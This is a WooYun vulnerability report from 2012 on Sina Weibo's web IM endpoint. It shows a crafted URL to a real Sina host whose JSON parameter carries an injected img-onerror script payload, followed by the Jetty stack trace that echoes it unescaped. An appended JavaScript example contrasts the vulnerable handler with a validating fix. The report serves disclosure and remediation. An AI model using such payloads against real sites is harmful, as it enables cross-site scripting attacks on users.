
Vulnerability summary

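Bug ID: wooyun-2012-05679

Vulnerability title: JSON data is processed without validation, causing an exception to be thrown.

Vendor: Sina

Author: marker

Submitted: 2012-03-31 11:01

Fixed: 2012-05-15 11:02

Published: 2012-05-15 11:02

Vulnerability type: Exception handling

Severity: Medium

Self-assessed Rank: 5

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or assistance, contact [email protected]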


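Vulnerability details

Disclosure status:

2012-03-31: Details reported to the vendor; awaiting vendor response
2012-03-31: Vendor confirmed; details disclosed to the vendor only
2012-04-10: Details disclosed to core white hats and experts in related fields
2012-04-20: Details disclosed to regular white hats
2012-04-30: Details disclosed to trainee white hats
2012-05-15: Details disclosed to the public

Brief description:

JSON data is processed without validation, causing an exception to be thrown.

Detailed description: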

http://2.49.web1.im.weibo.com/im?jsonp=parent.org.cometd.script._callback57&message=[{%22channel%22:%22/meta/connect%22%3E;%3Cimg%20src=e%20onerror=alert%281234%29%3E%22,%22connectionType%22:%22callback-polling%22,%22id%22:58,%22clientId%22:%221s1wcv8qe8ap74hddzu%22}]&1333160737516

Proof of vulnerability:

HTTP ERROR 404
Problem accessing /error.html. Reason:
NOT_FOUND
Caused by:
java.lang.Error: [{"channel":"/meta/connect">;<img src=e onerror=alert(1234)>","connectionType":"callback-polling","id":58,"clientId":"1s1wcv8qe8ap74hddzu"}]
at org.mortbay.cometd.AbstractCometdServlet.getMessages(AbstractCometdServlet.java:343)
at org.mortbay.cometd.continuation.ContinuationCometdServlet.service(ContinuationCometdServlet.java:71)
at org.mortbay.cometd.AbstractCometdServlet.service(AbstractCometdServlet.java:249)
at org.mortbay.jetty.servlet.ServletHolder.handle(ServletHolder.java:511)
at org.mortbay.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1166)
at filters.SetCharacterEncodingFilter.doFilter(SetCharacterEncodingFilter.java:134)
at org.mortbay.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1157)
at org.mortbay.jetty.servlet.ServletHandler.handle(ServletHandler.java:388)
at org.mortbay.jetty.security.SecurityHandler.handle(SecurityHandler.java:216)
at org.mortbay.jetty.servlet.SessionHandler.handle(SessionHandler.java:182)
at org.mortbay.jetty.handler.ContextHandler.handle(ContextHandler.java:765)
at org.mortbay.jetty.webapp.WebAppContext.handle(WebAppContext.java:418)
at org.mortbay.jetty.handler.ContextHandlerCollection.handle(ContextHandlerCollection.java:230)
at org.mortbay.jetty.handler.HandlerCollection.handle(HandlerCollection.java:114)
at org.mortbay.jetty.handler.HandlerWrapper.handle(HandlerWrapper.java:152)
at org.mortbay.jetty.handler.StatisticsHandler.handle(StatisticsHandler.java:53)
at cn.vika.webim.servlet.RequestStat.handle(RequestStat.java:51)
at org.mortbay.jetty.handler.HandlerWrapper.handle(HandlerWrapper.java:152)
at org.mortbay.jetty.Server.handle(Server.java:326)
at org.mortbay.jetty.HttpConnection.handleRequest(HttpConnection.java:542)
at org.mortbay.jetty.HttpConnection$RequestHandler.headerComplete(HttpConnection.java:923)
at org.mortbay.jetty.HttpParser.parseNext(HttpParser.java:547)
at org.mortbay.jetty.HttpParser.parseAvailable(HttpParser.java:212)
at org.mortbay.jetty.HttpConnection.handle(HttpConnection.java:404)
at org.mortbay.io.nio.SelectChannelEndPoint.run(SelectChannelEndPoint.java:409)
at org.mortbay.thread.QueuedThreadPool$PoolThread.run(QueuedThreadPool.java:582)
Caused by: java.lang.IllegalStateException: Unexpected '>' while seeking one of ',}'
at org.mortbay.util.ajax.JSON.seekTo(JSON.java:1167)
at org.mortbay.util.ajax.JSON.parseObject(JSON.java:812)
at org.mortbay.util.ajax.JSON.parse(JSON.java:745)
at org.mortbay.util.ajax.JSON.parseArray(JSON.java:880)
at org.mortbay.util.ajax.JSON.parse(JSON.java:747)
at org.mortbay.cometd.MessagePool.parseTo(MessagePool.java:151)
at org.mortbay.cometd.AbstractCometdServlet.getMessages(AbstractCometdServlet.java:331)
... 25 more
Caused by:
java.lang.IllegalStateException: Unexpected '>' while seeking one of ',}'
at org.mortbay.util.ajax.JSON.seekTo(JSON.java:1167)
at org.mortbay.util.ajax.JSON.parseObject(JSON.java:812)
at org.mortbay.util.ajax.JSON.parse(JSON.java:745)
at org.mortbay.util.ajax.JSON.parseArray(JSON.java:880)
at org.mortbay.util.ajax.JSON.parse(JSON.java:747)
at org.mortbay.cometd.MessagePool.parseTo(MessagePool.java:151)
at org.mortbay.cometd.AbstractCometdServlet.getMessages(AbstractCometdServlet.java:331)
at org.mortbay.cometd.continuation.ContinuationCometdServlet.service(ContinuationCometdServlet.java:71)
at org.mortbay.cometd.AbstractCometdServlet.service(AbstractCometdServlet.java:249)
at org.mortbay.jetty.servlet.ServletHolder.handle(ServletHolder.java:511)
at org.mortbay.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1166)
at filters.SetCharacterEncodingFilter.doFilter(SetCharacterEncodingFilter.java:134)
at org.mortbay.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1157)
at org.mortbay.jetty.servlet.ServletHandler.handle(ServletHandler.java:388)
at org.mortbay.jetty.security.SecurityHandler.handle(SecurityHandler.java:216)
at org.mortbay.jetty.servlet.SessionHandler.handle(SessionHandler.java:182)
at org.mortbay.jetty.handler.ContextHandler.handle(ContextHandler.java:765)
at org.mortbay.jetty.webapp.WebAppContext.handle(WebAppContext.java:418)
at org.mortbay.jetty.handler.ContextHandlerCollection.handle(ContextHandlerCollection.java:230)
at org.mortbay.jetty.handler.HandlerCollection.handle(HandlerCollection.java:114)
at org.mortbay.jetty.handler.HandlerWrapper.handle(HandlerWrapper.java:152)
at org.mortbay.jetty.handler.StatisticsHandler.handle(StatisticsHandler.java:53)
at cn.vika.webim.servlet.RequestStat.handle(RequestStat.java:51)
at org.mortbay.jetty.handler.HandlerWrapper.handle(HandlerWrapper.java:152)
at org.mortbay.jetty.Server.handle(Server.java:326)
at org.mortbay.jetty.HttpConnection.handleRequest(HttpConnection.java:542)
at org.mortbay.jetty.HttpConnection$RequestHandler.headerComplete(HttpConnection.java:923)
at org.mortbay.jetty.HttpParser.parseNext(HttpParser.java:547)
at org.mortbay.jetty.HttpParser.parseAvailable(HttpParser.java:212)
at org.mortbay.jetty.HttpConnection.handle(HttpConnection.java:404)
at org.mortbay.io.nio.SelectChannelEndPoint.run(SelectChannelEndPoint.java:409)
at org.mortbay.thread.QueuedThreadPool$PoolThread.run(QueuedThreadPool.java:582)
Powered by Jetty://

Fix:

Validate input and add exception handling.

Copyright notice: when reposting, please credit the source marker@WooYun
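
The fix proposed above (validate input, add exception handling), shown as an added example that is not part of the original report and is not Sina's, Jetty's or cometd's code: the reported request handled before and after. It is written in JavaScript for Node.js so that it runs stand-alone, whereas the affected service is Java; the function names and the two allowlist patterns are assumptions.

```javascript
// Added example: not code from Sina, Jetty or cometd. Allowlists are assumptions.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/; // dotted JS identifier
const CHANNEL_RE = /^(\/[A-Za-z0-9_*-]+)+$/;                    // e.g. /meta/connect

// The "message" value from the report's trace (malformed JSON carrying markup).
const REPORTED = '[{"channel":"/meta/connect">;<img src=e onerror=alert(1234)>",' +
  '"connectionType":"callback-polling","id":58,"clientId":"1s1wcv8qe8ap74hddzu"}]';

// Before: a parse failure turns the raw parameter into the error text, which
// the container then writes into an HTML error page without escaping.
function handleVulnerable(params) {
  try {
    JSON.parse(params.message);
    return { status: 200, type: 'text/javascript', body: `${params.jsonp}([])` };
  } catch (e) {
    return { status: 404, type: 'text/html',
      body: `<h2>HTTP ERROR 404</h2><pre>java.lang.Error: ${params.message}</pre>` };
  }
}

// After: fixed client-facing text, details kept in the server-side log only.
function reject(reason, log) {
  const ref = Math.random().toString(16).slice(2, 10); // correlation id, not a secret
  log.push({ ref, reason });
  return { status: 400, type: 'text/plain; charset=utf-8', body: `Bad request (ref ${ref})` };
}

function handleHardened(params, log = []) {
  if (!CALLBACK_RE.test(params.jsonp || '')) return reject('bad jsonp callback', log);
  let messages;
  try {
    messages = JSON.parse(params.message);
  } catch (e) {
    return reject('unparseable message', log); // never echo params.message
  }
  if (!Array.isArray(messages) || messages.length === 0) {
    return reject('not a message array', log);
  }
  for (const m of messages) {
    const ok = m !== null && typeof m === 'object' &&
      typeof m.channel === 'string' && CHANNEL_RE.test(m.channel);
    if (!ok) return reject('bad channel', log);
  }
  return { status: 200, type: 'text/javascript', body: `${params.jsonp}([])` };
}
```

The hardened path answers with `text/plain` and a reference id, so the operator can still find the failure in the log while nothing from the request reaches the response body.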


Vulnerability response

Vendor response:

Severity: Low

Vulnerability Rank: 2

Confirmed: 2012-03-31 12:07

Vendor reply:

Thank you for providing this.

Latest status:

None

